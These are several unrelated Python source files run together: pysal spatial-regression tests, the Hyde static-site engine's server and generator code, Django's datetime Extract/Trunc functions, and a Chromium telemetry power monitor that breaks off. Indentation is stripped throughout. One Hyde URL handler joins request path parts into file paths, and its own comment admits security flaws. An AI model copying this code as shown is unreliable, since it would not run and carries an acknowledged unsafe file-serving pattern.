np.testing.assert_array_almost_equal(reg.y[0],y,6)
x = np.array([ 1. , 19.531])
np.testing.assert_array_almost_equal(reg.x.toarray()[0],x,6)
yend = np.array([ 15.72598])
np.testing.assert_array_almost_equal(reg.yend[0],yend,6)
z = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.z.toarray()[0],z,6)
my = 38.43622446938776
self.assertAlmostEqual(reg.mean_y,my)
sy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,sy)
vm = np.array([[ 529.15644447, -15.78333817, -8.38016887],
[ -15.78333817, 0.54023465, 0.2311196 ],
[ -8.38016887, 0.2311196 , 0.14497647]])
np.testing.assert_array_almost_equal(reg.vm,vm,5)
pr2 = 0.346472557570858
self.assertAlmostEqual(reg.pr2,pr2)
sig2 = 192.50040382591442
self.assertAlmostEqual(reg.sig2,sig2,5)
std_err = np.array([ 23.003401 , 0.73500657, 0.38075777])
np.testing.assert_array_almost_equal(reg.std_err,std_err,6)
z_stat = np.array([[ 2.40664208, 0.01609994], [ 0.63144305, 0.52775088], [-1.75659016, 0.07898769]])
np.testing.assert_array_almost_equal(reg.z_stat,z_stat,6)
class TestBaseGMCombo(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
# Only spatial lag
yd2, q2 = pysal.spreg.utils.set_endog(self.y, self.X, self.w, None, None, 1, True)
self.X = np.hstack((np.ones(self.y.shape),self.X))
self.X = sparse.csr_matrix(self.X)
reg = SP.BaseGM_Combo(self.y, self.X, yend=yd2, q=q2, w=self.w.sparse)
betas = np.array([[ 57.61123461],[ 0.73441314], [ -0.59459416], [ -0.21762921], [ 0.54732051]])
np.testing.assert_array_almost_equal(reg.betas,betas,5)
u = np.array([ 25.57932637])
np.testing.assert_array_almost_equal(reg.u[0],u,6)
e_filtered = np.array([ 31.65374945])
np.testing.assert_array_almost_equal(reg.e_filtered[0],e_filtered,5)
predy = np.array([ 54.88767663])
np.testing.assert_array_almost_equal(reg.predy[0],predy,6)
n = 49
self.assertAlmostEqual(reg.n,n)
k = 4
self.assertAlmostEqual(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,6)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.x.toarray()[0],x,6)
yend = np.array([ 35.4585005])
np.testing.assert_array_almost_equal(reg.yend[0],yend,6)
z = np.array([ 1. , 19.531 , 15.72598 , 35.4585005])
np.testing.assert_array_almost_equal(reg.z.toarray()[0],z,6)
my = 38.43622446938776
self.assertAlmostEqual(reg.mean_y,my)
sy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,sy)
vm = np.array([[ 5.22438894e+02, -6.07257246e+00, -1.91428892e+00, -8.97134337e+00], [ -6.07257246e+00, 2.38012836e-01, 4.70160750e-02, 2.80964005e-02], [ -1.91428911e+00, 4.70160773e-02, 3.20924154e-02, 3.14968682e-03], [ -8.97134237e+00, 2.80964005e-02, 3.14968682e-03, 2.15753890e-01]])
np.testing.assert_array_almost_equal(reg.vm,vm,4)
sig2 = 181.78650186468832
self.assertAlmostEqual(reg.sig2,sig2,4)
class TestGMCombo(unittest.TestCase):
def setUp(self):
db=pysal.open(pysal.examples.get_path("columbus.dbf"),"r")
y = np.array(db.by_col("HOVAL"))
self.y = np.reshape(y, (49,1))
X = []
X.append(db.by_col("INC"))
X.append(db.by_col("CRIME"))
self.X = np.array(X).T
self.X = sparse.csr_matrix(self.X)
self.w = pysal.rook_from_shapefile(pysal.examples.get_path("columbus.shp"))
self.w.transform = 'r'
def test_model(self):
# Only spatial lag
reg = SP.GM_Combo(self.y, self.X, w=self.w)
e_reduced = np.array([ 28.18617481])
np.testing.assert_array_almost_equal(reg.e_pred[0],e_reduced,6)
predy_e = np.array([ 52.28082782])
np.testing.assert_array_almost_equal(reg.predy_e[0],predy_e,6)
betas = np.array([[ 57.61123515],[ 0.73441313], [ -0.59459416], [ -0.21762921], [ 0.54732051]])
np.testing.assert_array_almost_equal(reg.betas,betas,6)
u = np.array([ 25.57932637])
np.testing.assert_array_almost_equal(reg.u[0],u,6)
e_filtered = np.array([ 31.65374945])
np.testing.assert_array_almost_equal(reg.e_filtered[0],e_filtered,5)
predy = np.array([ 54.88767685])
np.testing.assert_array_almost_equal(reg.predy[0],predy,6)
n = 49
self.assertAlmostEqual(reg.n,n)
k = 4
self.assertAlmostEqual(reg.k,k)
y = np.array([ 80.467003])
np.testing.assert_array_almost_equal(reg.y[0],y,6)
x = np.array([ 1. , 19.531 , 15.72598])
np.testing.assert_array_almost_equal(reg.x.toarray()[0],x,6)
yend = np.array([ 35.4585005])
np.testing.assert_array_almost_equal(reg.yend[0],yend,6)
z = np.array([ 1. , 19.531 , 15.72598 , 35.4585005])
np.testing.assert_array_almost_equal(reg.z.toarray()[0],z,6)
my = 38.43622446938776
self.assertAlmostEqual(reg.mean_y,my)
sy = 18.466069465206047
self.assertAlmostEqual(reg.std_y,sy)
vm = np.array([[ 5.22438894e+02, -6.07257246e+00, -1.91428892e+00, -8.97134337e+00], [ -6.07257218e+00, 2.38012839e-01, 4.70160773e-02, 2.80964005e-02], [ -1.91428911e+00, 4.70160773e-02, 3.20924154e-02, 3.14968682e-03], [ -8.97134237e+00, 2.80964005e-02, 3.14968682e-03, 2.15753890e-01]])
np.testing.assert_array_almost_equal(reg.vm,vm,4)
sig2 = 181.78650186468832
self.assertAlmostEqual(reg.sig2,sig2,4)
pr2 = 0.3018280166937799
self.assertAlmostEqual(reg.pr2,pr2)
pr2_e = 0.3561355587000738
self.assertAlmostEqual(reg.pr2_e,pr2_e)
std_err = np.array([ 22.85692222, 0.48786559, 0.17914356, 0.46449318])
np.testing.assert_array_almost_equal(reg.std_err,std_err,5)
z_stat = np.array([[ 2.52051597e+00, 1.17182922e-02], [ 1.50535954e+00, 1.32231664e-01], [ -3.31909311e+00, 9.03103123e-04], [ -4.68530506e-01, 6.39405261e-01]])
np.testing.assert_array_almost_equal(reg.z_stat,z_stat,6)
if __name__ == '__main__':
start_suppress = np.get_printoptions()['suppress']
np.set_printoptions(suppress=True)
unittest.main()
np.set_printoptions(suppress=start_suppress)
| |
"""
Entry Points for Hyde Engine
"""
import imp
import mimetypes
import os
import sys
import subprocess
import urllib
from collections import defaultdict
from Queue import Queue, Empty
from threading import Thread, Event
from django.conf import settings
from django.template import add_to_builtins
from file_system import File, Folder
from path_util import PathUtil
from processor import Processor
from siteinfo import SiteInfo
from url import clean_url
class _HydeDefaults:
GENERATE_CLEAN_URLS = False
GENERATE_ABSOLUTE_FS_URLS = False
LISTING_PAGE_NAMES = ['index', 'default', 'listing']
APPEND_SLASH = False
MEDIA_PROCESSORS = {}
CONTENT_PROCESSORS = {}
SITE_PRE_PROCESSORS = {}
SITE_POST_PROCESSORS = {}
CONTEXT = {}
RST_SETTINGS_OVERRIDES = {}
def setup_env(site_path):
"""
Initializes the Django Environment. NOOP if the environment is
initialized already.
"""
# Don't do it twice
if hasattr(settings, "CONTEXT"):
return
settings_file = os.path.join(site_path, "settings.py")
if not os.path.exists(settings_file):
print "No Site Settings File Found"
raise ValueError("The given site_path [%s] does not contain a hyde site. "
"Give a valid path or run -init to create a new site." % (site_path,))
try:
hyde_site_settings = imp.load_source("hyde_site_settings",
os.path.join(site_path,"settings.py"))
except SyntaxError, err:
print "The given site_path [%s] contains a settings file " \
"that could not be loaded due syntax errors." % site_path
print err
exit()
except Exception, err:
print "Failed to import Site Settings"
print "The settings file [%s] contains errors." % (settings_file,)
raise
try:
from django.conf import global_settings
defaults = global_settings.__dict__
defaults.update(hyde_site_settings.__dict__)
settings.configure(_HydeDefaults, **defaults)
except Exception, err:
print "Site settings are not defined properly"
print err
raise ValueError(
"The given site_path [%s] has invalid settings. "
"Give a valid path or run -init to create a new site."
% site_path
)
def validate_settings():
"""
Ensures the site settings are properly configured.
"""
if settings.GENERATE_CLEAN_URLS and settings.GENERATE_ABSOLUTE_FS_URLS:
raise ValueError(
"GENERATE_CLEAN_URLS and GENERATE_ABSOLUTE_FS_URLS cannot "
"be enabled at the same time."
)
class Server(object):
"""
Initializes and runs a cherrypy webserver serving static files from the deploy
folder
"""
def __init__(self, site_path, address='localhost', port=8080):
super(Server, self).__init__()
self.site_path = os.path.abspath(os.path.expandvars(
os.path.expanduser(site_path)))
self.address = address
self.port = port
def serve(self, deploy_path, exit_listner):
"""
Starts the cherrypy server at the given `deploy_path`. If exit_listner is
provided, calls it when the engine exits.
"""
try:
import cherrypy
from cherrypy.lib.static import serve_file
except ImportError:
print "Cherry Py is required to run the webserver"
raise
setup_env(self.site_path)
validate_settings()
deploy_folder = Folder(
(deploy_path, settings.DEPLOY_DIR)
[not deploy_path])
if not 'site' in settings.CONTEXT:
generator = Generator(self.site_path)
generator.create_siteinfo()
site = settings.CONTEXT['site']
url_file_mapping = defaultdict(bool)
# This following bit is for supporting listing pages with arbitrary
# filenames.
if settings.GENERATE_CLEAN_URLS:
for page in site.walk_pages(): # build url to file mapping
if page.listing and page.file.name_without_extension not in \
(settings.LISTING_PAGE_NAMES + [page.node.name]):
filename = page.target_file.path
url = page.url.strip('/')
url_file_mapping[url] = filename
class WebRoot:
@cherrypy.expose
def index(self):
page = site.listing_page
return serve_file(deploy_folder.child(page.name))
if settings.GENERATE_CLEAN_URLS:
@cherrypy.expose
def default(self, *args):
# TODO notice that this method has security flaws
# TODO for every url_file_mapping not found, we will
# save that in url_file_mapping. not optimal.
# first, see if the url is in the url_file_mapping
# dictionary
file = url_file_mapping[os.sep.join(args)]
if file:
return serve_file(file)
# next, try to find a listing page whose filename is the
# same as its enclosing folder's name
file = os.path.join(deploy_folder.path, os.sep.join(args),
args[-1] + '.html')
if os.path.isfile(file):
return serve_file(file)
# try each filename in LISTING_PAGE_NAMES setting
for listing_name in settings.LISTING_PAGE_NAMES:
file = os.path.join(deploy_folder.path,
os.sep.join(args),
listing_name + '.html')
if os.path.isfile(file):
return serve_file(file)
# failing that, search for a non-listing page
file = os.path.join(deploy_folder.path,
os.sep.join(args[:-1]),
args[-1] + '.html')
if os.path.isfile(file):
return serve_file(file)
# failing that, page not found
raise cherrypy.NotFound
cherrypy.config.update({'environment': 'production',
'log.error_file': 'site.log',
'log.screen': True,
'server.socket_host': self.address,
'server.socket_port': self.port,
})
# even if we're still using clean urls, we still need to serve media.
if settings.GENERATE_CLEAN_URLS:
media_web_path = '/%s/media' % settings.SITE_ROOT.strip('/')
# if SITE_ROOT is /, we end up with //media
media_web_path = media_web_path.replace('//', '/')
conf = {media_web_path: {
'tools.staticdir.dir':os.path.join(deploy_folder.path,
settings.SITE_ROOT.strip('/'),
'media'),
'tools.staticdir.on':True
}}
else:
conf = {'/': {
'tools.staticdir.dir': deploy_folder.path,
'tools.staticdir.on':True
}}
cherrypy.tree.mount(WebRoot(), settings.SITE_ROOT, conf)
if exit_listner:
cherrypy.engine.subscribe('exit', exit_listner)
cherrypy.engine.start()
@property
def alive(self):
"""
Checks if the webserver is alive.
"""
import cherrypy
return cherrypy.engine.state == cherrypy.engine.states.STARTED
def block(self):
"""
Blocks and waits for the engine to exit.
"""
import cherrypy
cherrypy.engine.block()
def quit(self):
import cherrypy
cherrypy.engine.exit()
# TODO split into a generic wsgi handler, combine it with the current server
def GeventServer(*args, **kwargs):
import gevent.greenlet
import gevent.wsgi
class GeventServerWrapper(Server):
STOP_TIMEOUT = 10
CHUNK_SIZE = 4096
FALLBACK_CONTENT_TYPE = 'application/octet-stream'
def __init__(self, *args, **kwargs):
super(GeventServerWrapper, self).__init__(*args, **kwargs)
addr = (self.address, self.port)
self.server = gevent.wsgi.WSGIServer(addr, self.request_handler)
self.paths = {}
self.root = None
# FIXME
mimetypes.init()
def serve(self, deploy_path, exit_listener):
setup_env(self.site_path)
validate_settings()
self.root = deploy_path or settings.DEPLOY_DIR
if not 'site' in settings.CONTEXT:
generator = Generator(self.site_path)
generator.create_siteinfo()
def add_url(url, path, listing):
# TODO fix this ugly url hack
if settings.GENERATE_CLEAN_URLS and '.' in url:
url = clean_url(url)
# strip names from listing pages
head, tail = os.path.split(url)
parent = os.path.basename(head)
name = os.path.splitext(tail)[0]
if listing and (name == parent or
name in settings.LISTING_PAGE_NAMES):
url = os.path.dirname(url)
self.paths.setdefault(url, path)
# gather all urls (only works if you generate it)
"""
site = settings.CONTEXT['site']
for page in site.walk_pages():
url = page.url.strip('/')
add_url(url, page.target_file.path, page.listing)
"""
# register all other static files
# FIXME we just register all files, we should do this properly
# FIXME we're relying on os.sep is /, fine for now
for dirpath, dirnames, filenames in os.walk(self.root):
path = dirpath[len(self.root)+1:]
for filename in filenames:
url = os.path.join(path, filename)
# do we know if it's listing or not?
add_url(url, os.path.join(dirpath, filename), listing=True)
import pprint
#print 'I currently serve: \n', pprint.pformat(sorted(self.paths.items()))
self.server.start()
print 'Started %s on %s:%s' % (self.server.base_env['SERVER_SOFTWARE'],
self.server.server_host,
self.server.server_port)
def block(self):
# XXX is there a nicer way of doing this?
try:
self.server._stopped_event.wait()
finally:
gevent.greenlet.Greenlet.spawn(self.server.stop,
timeout=self.STOP_TIMEOUT).join()
def quit(self):
self.server.stop(timeout=self.STOP_TIMEOUT)
def request_handler(self, env, start_response):
# extract the real requested file
path = os.path.abspath(urllib.unquote_plus(env['PATH_INFO']))
# check if file exists
filename = self.paths.get(path.strip('/'))
if not filename or not os.path.exists(filename):
start_response('404 Not Found', [('Content-Type', 'text/plain')])
yield 'Not Found\n'
return
# TODO how do we easiest detect mime types?
content_type, encoding = mimetypes.guess_type(filename)
if not content_type:
content_type = self.FALLBACK_CONTENT_TYPE
start_response('200 OK', [('Content-Type', content_type)])
# TODO make this async?
f = file(filename, 'rb')
try:
chunk = f.read(self.CHUNK_SIZE)
while chunk:
yield chunk
chunk = f.read(self.CHUNK_SIZE)
finally:
f.close()
return GeventServerWrapper(*args, **kwargs)
class Generator(object):
"""
Generates a deployable website from the templates. Can monitor the site for
"""
def __init__(self, site_path):
super(Generator, self).__init__()
self.site_path = os.path.abspath(os.path.expandvars(
os.path.expanduser(site_path)))
self.regenerate_request = Event()
self.regeneration_complete = Event()
self.queue = Queue()
self.watcher = Thread(target=self.__watch__)
self.regenerator = Thread(target=self.__regenerate__)
self.processor = Processor(settings)
self.quitting = False
def notify(self, title, message):
if hasattr(settings, "GROWL") and settings.GROWL and File(settings.GROWL).exists:
try:
subprocess.call([settings.GROWL, "-n", "Hyde", "-t", title, "-m", message])
except:
pass
elif hasattr(settings, "NOTIFY") and settings.NOTIFY and File(settings.NOTIFY).exists:
try:
subprocess.call([settings.NOTIFY, "Hyde: " + title, message])
except:
pass
def pre_process(self, node):
self.processor.pre_process(node)
def process(self, item, change="Added"):
if change in ("Added", "Modified"):
settings.CONTEXT['node'] = item.node
settings.CONTEXT['resource'] = item
return self.processor.process(item)
elif change in ("Deleted", "NodeRemoved"):
return self.processor.remove(item)
def build_siteinfo(self, deploy_path=None):
tmp_folder = Folder(settings.TMP_DIR)
deploy_folder = Folder(
(deploy_path, settings.DEPLOY_DIR)
[not deploy_path])
if deploy_folder.exists and settings.BACKUP:
backup_folder = Folder(settings.BACKUPS_DIR).make()
deploy_folder.backup(backup_folder)
tmp_folder.delete()
tmp_folder.make()
settings.DEPLOY_DIR = deploy_folder.path
if not deploy_folder.exists:
deploy_folder.make()
add_to_builtins('hydeengine.templatetags.hydetags')
add_to_builtins('hydeengine.templatetags.aym')
add_to_builtins('hydeengine.templatetags.typogrify')
self.create_siteinfo()
def create_siteinfo(self):
self.siteinfo = SiteInfo(settings, self.site_path)
self.siteinfo.refresh()
settings.CONTEXT['site'] = self.siteinfo.content_node
def post_process(self, node):
self.processor.post_process(node)
def process_all(self):
self.notify(self.siteinfo.name, "Website Generation Started")
try:
self.pre_process(self.siteinfo)
for resource in self.siteinfo.walk_resources():
self.process(resource)
self.complete_generation()
except Exception, e:
print >> sys.stderr, "Generation Failed"
print >> sys.stderr, sys.exc_info()
self.notify(self.siteinfo.name, "Generation Failed")
return
self.notify(self.siteinfo.name, "Generation Complete")
def complete_generation(self):
self.post_process(self.siteinfo)
self.siteinfo.target_folder.copy_contents_of(
self.siteinfo.temp_folder, incremental=True)
if(hasattr(settings, "post_deploy")):
settings.post_deploy()
def __regenerate__(self):
pending = False
while True:
try:
if self.quit_event.isSet():
self.notify(self.siteinfo.name, "Exiting Regenerator")
print "Exiting regenerator..."
break
# Wait for the regeneration event to be set
self.regenerate_request.wait(5)
# Wait until there are no more requests
# Got a request, we dont want to process it
# immedietely since other changes may be under way.
# Another request coming in renews the initil request.
# When there are no more requests, we go are and process
# the event.
if not self.regenerate_request.isSet() and pending:
pending = False
self.process_all()
self.regeneration_complete.set()
elif self.regenerate_request.isSet():
self.regeneration_complete.clear()
pending = True
self.regenerate_request.clear()
except:
print >> sys.stderr, "Error during regeneration"
print >> sys.stderr, sys.exc_info()
self.notify(self.siteinfo.name, "Error during regeneration")
self.regeneration_complete.set()
self.regenerate_request.clear()
pending = False
def __watch__(self):
regenerating = False
while True:
try:
if self.quit_event.isSet():
print "Exiting watcher..."
self.notify(self.siteinfo.name, "Exiting Watcher")
break
try:
pending = self.queue.get(timeout=10)
except Empty:
continue
self.queue.task_done()
if pending.setdefault("exception", False):
self.quit_event.set()
print "Exiting watcher"
self.notify(self.siteinfo.name, "Exiting Watcher")
break
if 'resource' in pending:
resource = pending['resource']
if self.regeneration_complete.isSet():
regenerating = False
if pending['change'] == "Deleted":
self.process(resource, pending['change'])
elif pending['change'] == "NodeRemoved":
self.process(pending['node'], pending['change'])
if (pending['change'] in ("Deleted", "NodeRemoved") or
resource.is_layout or regenerating):
regenerating = True
self.regenerate_request.set()
continue
self.notify(self.siteinfo.name, "Processing " + resource.name)
if self.process(resource, pending['change']):
self.complete_generation()
self.notify(self.siteinfo.name, "Completed processing " + resource.name)
except:
print >> sys.stderr, "Error during regeneration"
print >> sys.stderr, sys.exc_info()
self.notify(self.siteinfo.name, "Error during regeneration")
self.regeneration_complete.set()
self.regenerate_request.clear()
regenerating = False
def generate(self, deploy_path=None,
keep_watching=False,
exit_listner=None):
self.exit_listner = exit_listner
self.quit_event = Event()
setup_env(self.site_path)
validate_settings()
self.build_siteinfo(deploy_path)
self.process_all()
self.siteinfo.temp_folder.delete()
if keep_watching:
try:
self.siteinfo.temp_folder.make()
self.watcher.start()
self.regenerator.start()
self.siteinfo.monitor(self.queue)
except (KeyboardInterrupt, IOError, SystemExit):
self.quit()
except:
self.quit()
raise
def block(self):
try:
while self.watcher.isAlive():
self.watcher.join(0.1)
while self.regenerator.isAlive():
self.regenerator.join(0.1)
self.siteinfo.dont_monitor()
except (KeyboardInterrupt, IOError, SystemExit):
self.quit()
except:
self.quit()
raise
def quit(self):
if self.quitting:
return
self.quitting = True
print "Shutting down..."
self.notify(self.siteinfo.name, "Shutting Down")
self.siteinfo.dont_monitor()
self.quit_event.set()
if self.exit_listner:
self.exit_listner()
class Initializer(object):
def __init__(self, site_path):
super(Initializer, self).__init__()
self.site_path = Folder(site_path)
def initialize(self, root, template=None, force=False):
if not template:
template = "default"
root_folder = Folder(root)
template_dir = root_folder.child_folder("templates", template)
if not template_dir.exists:
raise ValueError(
"Cannot find the specified template[%s]." % template_dir)
if self.site_path.exists:
files = os.listdir(self.site_path.path)
PathUtil.filter_hidden_inplace(files)
if len(files) and not force:
raise ValueError(
"The site_path[%s] is not empty." % self.site_path)
elif force:
self.site_path.delete()
self.site_path.make()
self.site_path.copy_contents_of(template_dir)
| |
from datetime import datetime
from django.conf import settings
from django.db.models import (
DateField, DateTimeField, DurationField, Field, Func, IntegerField,
TimeField, Transform, fields,
)
from django.db.models.lookups import (
YearExact, YearGt, YearGte, YearLt, YearLte,
)
from django.utils import timezone
class TimezoneMixin:
tzinfo = None
def get_tzname(self):
# Timezone conversions must happen to the input datetime *before*
# applying a function. 2015-12-31 23:00:00 -02:00 is stored in the
# database as 2016-01-01 01:00:00 +00:00. Any results should be
# based on the input datetime not the stored datetime.
tzname = None
if settings.USE_TZ:
if self.tzinfo is None:
tzname = timezone.get_current_timezone_name()
else:
tzname = timezone._get_timezone_name(self.tzinfo)
return tzname
class Extract(TimezoneMixin, Transform):
lookup_name = None
output_field = IntegerField()
def __init__(self, expression, lookup_name=None, tzinfo=None, **extra):
if self.lookup_name is None:
self.lookup_name = lookup_name
if self.lookup_name is None:
raise ValueError('lookup_name must be provided')
self.tzinfo = tzinfo
super().__init__(expression, **extra)
def as_sql(self, compiler, connection):
sql, params = compiler.compile(self.lhs)
lhs_output_field = self.lhs.output_field
if isinstance(lhs_output_field, DateTimeField):
tzname = self.get_tzname()
sql = connection.ops.datetime_extract_sql(self.lookup_name, sql, tzname)
elif isinstance(lhs_output_field, DateField):
sql = connection.ops.date_extract_sql(self.lookup_name, sql)
elif isinstance(lhs_output_field, TimeField):
sql = connection.ops.time_extract_sql(self.lookup_name, sql)
elif isinstance(lhs_output_field, DurationField):
if not connection.features.has_native_duration_field:
raise ValueError('Extract requires native DurationField database support.')
sql = connection.ops.time_extract_sql(self.lookup_name, sql)
else:
# resolve_expression has already validated the output_field so this
# assert should never be hit.
assert False, "Tried to Extract from an invalid type."
return sql, params
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
copy = super().resolve_expression(query, allow_joins, reuse, summarize, for_save)
field = copy.lhs.output_field
if not isinstance(field, (DateField, DateTimeField, TimeField, DurationField)):
raise ValueError(
'Extract input expression must be DateField, DateTimeField, '
'TimeField, or DurationField.'
)
# Passing dates to functions expecting datetimes is most likely a mistake.
if type(field) == DateField and copy.lookup_name in ('hour', 'minute', 'second'):
raise ValueError(
"Cannot extract time component '%s' from DateField '%s'. " % (copy.lookup_name, field.name)
)
return copy
class ExtractYear(Extract):
lookup_name = 'year'
class ExtractIsoYear(Extract):
"""Return the ISO-8601 week-numbering year."""
lookup_name = 'iso_year'
class ExtractMonth(Extract):
lookup_name = 'month'
class ExtractDay(Extract):
lookup_name = 'day'
class ExtractWeek(Extract):
"""
Return 1-52 or 53, based on ISO-8601, i.e., Monday is the first of the
week.
"""
lookup_name = 'week'
class ExtractWeekDay(Extract):
"""
Return Sunday=1 through Saturday=7.
To replicate this in Python: (mydatetime.isoweekday() % 7) + 1
"""
lookup_name = 'week_day'
class ExtractQuarter(Extract):
lookup_name = 'quarter'
class ExtractHour(Extract):
lookup_name = 'hour'
class ExtractMinute(Extract):
lookup_name = 'minute'
class ExtractSecond(Extract):
lookup_name = 'second'
DateField.register_lookup(ExtractYear)
DateField.register_lookup(ExtractMonth)
DateField.register_lookup(ExtractDay)
DateField.register_lookup(ExtractWeekDay)
DateField.register_lookup(ExtractWeek)
DateField.register_lookup(ExtractIsoYear)
DateField.register_lookup(ExtractQuarter)
TimeField.register_lookup(ExtractHour)
TimeField.register_lookup(ExtractMinute)
TimeField.register_lookup(ExtractSecond)
DateTimeField.register_lookup(ExtractHour)
DateTimeField.register_lookup(ExtractMinute)
DateTimeField.register_lookup(ExtractSecond)
ExtractYear.register_lookup(YearExact)
ExtractYear.register_lookup(YearGt)
ExtractYear.register_lookup(YearGte)
ExtractYear.register_lookup(YearLt)
ExtractYear.register_lookup(YearLte)
ExtractIsoYear.register_lookup(YearExact)
ExtractIsoYear.register_lookup(YearGt)
ExtractIsoYear.register_lookup(YearGte)
ExtractIsoYear.register_lookup(YearLt)
ExtractIsoYear.register_lookup(YearLte)
class Now(Func):
template = 'CURRENT_TIMESTAMP'
output_field = fields.DateTimeField()
def as_postgresql(self, compiler, connection, **extra_context):
# PostgreSQL's CURRENT_TIMESTAMP means "the time at the start of the
# transaction". Use STATEMENT_TIMESTAMP to be cross-compatible with
# other databases.
return self.as_sql(compiler, connection, template='STATEMENT_TIMESTAMP()', **extra_context)
class TruncBase(TimezoneMixin, Transform):
kind = None
tzinfo = None
def __init__(self, expression, output_field=None, tzinfo=None, **extra):
self.tzinfo = tzinfo
super().__init__(expression, output_field=output_field, **extra)
def as_sql(self, compiler, connection):
inner_sql, inner_params = compiler.compile(self.lhs)
if isinstance(self.output_field, DateTimeField):
tzname = self.get_tzname()
sql = connection.ops.datetime_trunc_sql(self.kind, inner_sql, tzname)
elif isinstance(self.output_field, DateField):
sql = connection.ops.date_trunc_sql(self.kind, inner_sql)
elif isinstance(self.output_field, TimeField):
sql = connection.ops.time_trunc_sql(self.kind, inner_sql)
else:
raise ValueError('Trunc only valid on DateField, TimeField, or DateTimeField.')
return sql, inner_params
def resolve_expression(self, query=None, allow_joins=True, reuse=None, summarize=False, for_save=False):
copy = super().resolve_expression(query, allow_joins, reuse, summarize, for_save)
field = copy.lhs.output_field
# DateTimeField is a subclass of DateField so this works for both.
assert isinstance(field, (DateField, TimeField)), (
"%r isn't a DateField, TimeField, or DateTimeField." % field.name
)
# If self.output_field was None, then accessing the field will trigger
# the resolver to assign it to self.lhs.output_field.
if not isinstance(copy.output_field, (DateField, DateTimeField, TimeField)):
raise ValueError('output_field must be either DateField, TimeField, or DateTimeField')
# Passing dates or times to functions expecting datetimes is most
# likely a mistake.
class_output_field = self.__class__.output_field if isinstance(self.__class__.output_field, Field) else None
output_field = class_output_field or copy.output_field
has_explicit_output_field = class_output_field or field.__class__ is not copy.output_field.__class__
if type(field) == DateField and (
isinstance(output_field, DateTimeField) or copy.kind in ('hour', 'minute', 'second', 'time')):
raise ValueError("Cannot truncate DateField '%s' to %s. " % (
field.name, output_field.__class__.__name__ if has_explicit_output_field else 'DateTimeField'
))
elif isinstance(field, TimeField) and (
isinstance(output_field, DateTimeField) or
copy.kind in ('year', 'quarter', 'month', 'week', 'day', 'date')):
raise ValueError("Cannot truncate TimeField '%s' to %s. " % (
field.name, output_field.__class__.__name__ if has_explicit_output_field else 'DateTimeField'
))
return copy
def convert_value(self, value, expression, connection):
if isinstance(self.output_field, DateTimeField):
if not settings.USE_TZ:
pass
elif value is not None:
value = value.replace(tzinfo=None)
value = timezone.make_aware(value, self.tzinfo)
elif not connection.features.has_zoneinfo_database:
raise ValueError(
'Database returned an invalid datetime value. Are time '
'zone definitions for your database installed?'
)
elif isinstance(value, datetime):
if value is None:
pass
elif isinstance(self.output_field, DateField):
value = value.date()
elif isinstance(self.output_field, TimeField):
value = value.time()
return value
class Trunc(TruncBase):
def __init__(self, expression, kind, output_field=None, tzinfo=None, **extra):
self.kind = kind
super().__init__(expression, output_field=output_field, tzinfo=tzinfo, **extra)
class TruncYear(TruncBase):
kind = 'year'
class TruncQuarter(TruncBase):
kind = 'quarter'
class TruncMonth(TruncBase):
kind = 'month'
class TruncWeek(TruncBase):
"""Truncate to midnight on the Monday of the week."""
kind = 'week'
class TruncDay(TruncBase):
kind = 'day'
class TruncDate(TruncBase):
kind = 'date'
lookup_name = 'date'
output_field = DateField()
def as_sql(self, compiler, connection):
# Cast to date rather than truncate to date.
lhs, lhs_params = compiler.compile(self.lhs)
tzname = timezone.get_current_timezone_name() if settings.USE_TZ else None
sql = connection.ops.datetime_cast_date_sql(lhs, tzname)
return sql, lhs_params
class TruncTime(TruncBase):
kind = 'time'
lookup_name = 'time'
output_field = TimeField()
def as_sql(self, compiler, connection):
# Cast to date rather than truncate to date.
lhs, lhs_params = compiler.compile(self.lhs)
tzname = timezone.get_current_timezone_name() if settings.USE_TZ else None
sql = connection.ops.datetime_cast_time_sql(lhs, tzname)
return sql, lhs_params
class TruncHour(TruncBase):
kind = 'hour'
class TruncMinute(TruncBase):
kind = 'minute'
class TruncSecond(TruncBase):
kind = 'second'
DateTimeField.register_lookup(TruncDate)
DateTimeField.register_lookup(TruncTime)
| |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import logging
import os
import plistlib
import shutil
import tempfile
import xml.parsers.expat
from telemetry.core import os_version
from telemetry.core import util
from telemetry import decorators
from telemetry.internal.platform import power_monitor
class PowerMetricsPowerMonitor(power_monitor.PowerMonitor):
def __init__(self, backend):
super(PowerMetricsPowerMonitor, self).__init__()
self._powermetrics_process = None
self._backend = backend
self._output_filename = None
self._output_directory = None
@property
def binary_path(self):
return '/usr/bin/powermetrics'
def StartMonitoringPower(self, browser):
assert not self._powermetrics_process, (
'Must call StopMonitoringPower().')
# Empirically powermetrics creates an empty output file immediately upon
# starting. We detect file creation as a signal that measurement has
# started. In order to avoid various race conditions in tempfile creation
# we create a temp directory and have powermetrics create it's output
# there rather than say, creating a tempfile, deleting it and reusing its
# name.
self._output_directory = tempfile.mkdtemp()
self._output_filename = os.path.join(self._output_directory,
'powermetrics.output')
args = ['-f', 'plist',
'-u', self._output_filename,
'-i0',
'--show-usage-summary']
self._powermetrics_process = self._backend.LaunchApplication(
self.binary_path, args, elevate_privilege=True)
# Block until output file is written to ensure this function call is
# synchronous in respect to powermetrics starting.
def _OutputFileExists():
return os.path.isfile(self._output_filename)
util.WaitFor(_OutputFileExists, 1)
@decorators.Cache
def CanMonitorPower(self):
mavericks_or_later = (
self._backend.GetOSVersionName() >= os_version.MAVERICKS)
binary_path = self.binary_path
return mavericks_or_later and self._backend.CanLaunchApplication(
binary_path)
@staticmethod
def _ParsePlistString(plist_string):
"""Wrapper to parse a plist from a string and catch any errors.
Sometimes powermetrics will exit in the middle of writing it's output,
empirically it seems that it always writes at least one sample in it's
entirety so we can safely ignore any errors in it's output.
Returns:
Parser output on succesful parse, None on parse error.
"""
try:
